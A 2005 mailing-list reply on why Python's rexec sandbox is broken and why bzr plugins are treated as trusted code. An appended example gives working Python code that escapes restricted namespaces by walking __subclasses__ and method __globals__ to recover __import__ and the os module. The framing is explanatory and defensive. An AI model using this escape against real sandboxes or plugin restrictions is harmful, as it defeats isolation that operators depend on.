Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ..


From: John A Meinel
Subject: Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?
Date: Tue, 23 Aug 2005 04:38:08 -0500
User-agent: Mozilla Thunderbird 1.0.6 (Macintosh/20050716)

Matthieu MOY wrote:
> martin f krafft said:

...

> I don't know how bzr can handle this. If there's support for sandboxing in
> Python, the plugin system of bzr can probably implement this in an elegant
> and secure way.

If you are talking about restricted execution (rexec), last time I read
the code, it was abandoned. As in, still there, but if you actually use
it, it throws an exception.

The problem is that the new style classes give you about 20 ways to
break out of the cage, and nobody stepped up to lock it down farther.

The specific example is this (I think you need at least python2.3):

None.__class__.__class__

This gives you a <type 'type'> object. I forget exactly how you go from
here, but there is basically a way to turn this into just about any
other class.

Anyway, just to say, right now, plugins are trusted code (i.e. you have to
trust them not to do bad things). This is risky to do as an
archive-manage hook.
The current access controls to a bzr archive are simply filesystem
permissions, so they fall about the same as Arch. Perhaps when the smart
server is implemented, this will be extended to something finer grained
(like monotone's allowed keys).

John
=:->
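The class-graph walk the message alludes to ("I forget exactly how you go from here"), as an added example; it is not part of the original message and not bzr's or rexec's own code. The message refers to Python 2.3's rexec; this runs on Python 3, where the same reachability holds. Starting from the literal None, with no imports and no builtins in scope, it reaches the metaclass `type`, enumerates every class loaded in the interpreter, and pulls a live module namespace (and from it the real `__import__`) out of an ordinary Python-level method. The helper names (`walk_classes`, `find_module_globals`, `recover_import`) are the example's own.

```python
"""Added example: how CPython's class graph defeats rexec-style sandboxing.

Nothing here is imported. Every object is reached by attribute access
starting from None, which is what a restricted namespace cannot withhold.
Helper names are this example's own, not bzr's or rexec's.
"""


def type_from_none():
    """None.__class__ is NoneType; NoneType.__class__ is the metaclass `type`."""
    return None.__class__.__class__


def walk_classes():
    """Return every class reachable from `object` via __subclasses__().

    type.__base__ is object, and object.__subclasses__() lists every class
    currently loaded in the interpreter, whether or not a sandbox chose to
    expose it by name.
    """
    root = type_from_none().__base__  # type.__base__ is object
    seen, stack = set(), [root]
    while stack:
        cls = stack.pop()
        if cls in seen:
            continue
        seen.add(cls)
        try:
            # Unbound form: works even when cls is `type` itself, where the
            # bound call cls.__subclasses__() raises TypeError.
            stack.extend(type.__subclasses__(cls))
        except TypeError:
            pass
    return seen


def _methods(cls):
    """Yield Python-level function objects stored directly on cls.

    A function object carries __globals__, the namespace of the module that
    defined it, so any class with a method written in Python hands out its
    module's entire namespace.
    """
    try:
        items = list(vars(cls).values())
    except TypeError:
        return
    for item in items:
        try:
            fn = getattr(item, "__func__", item)  # unwrap static/classmethod
            if isinstance(getattr(fn, "__globals__", None), dict):
                yield fn
        except Exception:
            continue


def find_module_globals(classes, module_name):
    """Return the globals dict of a method defined in module_name, or None."""
    for cls in classes:
        for fn in _methods(cls):
            if fn.__globals__.get("__name__") == module_name:
                return fn.__globals__
    return None


def recover_import(classes):
    """Rebuild __import__ from any function's __globals__['__builtins__'].

    This is the capability rexec tried to withhold: with __import__ in hand,
    every module on the system is reachable.
    """
    for cls in classes:
        for fn in _methods(cls):
            b = fn.__globals__.get("__builtins__")
            if b is None:
                continue
            # __builtins__ is the module in __main__ and a dict elsewhere.
            ns = b if isinstance(b, dict) else vars(b)
            if "__import__" in ns:
                return ns["__import__"]
    return None


if __name__ == "__main__":
    classes = walk_classes()
    print(f"type via None: {type_from_none()!r}; {len(classes)} classes reachable")
    os_ns = find_module_globals(classes, "os")  # os is always loaded by site.py
    print("os namespace recovered:", os_ns is not None and "getcwd" in os_ns)
    imp = recover_import(classes)
    print("__import__ recovered:", imp is not None, "->", imp("math").sqrt(16.0))
```

The point for a plugin system is that there is no single attribute to hide: every Python-level method in any loaded class is a door, so restricting names in the plugin's namespace cannot produce a boundary. Isolation has to come from outside the interpreter (a separate process under OS-level confinement), which is consistent with the message's conclusion that plugins are simply trusted code.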
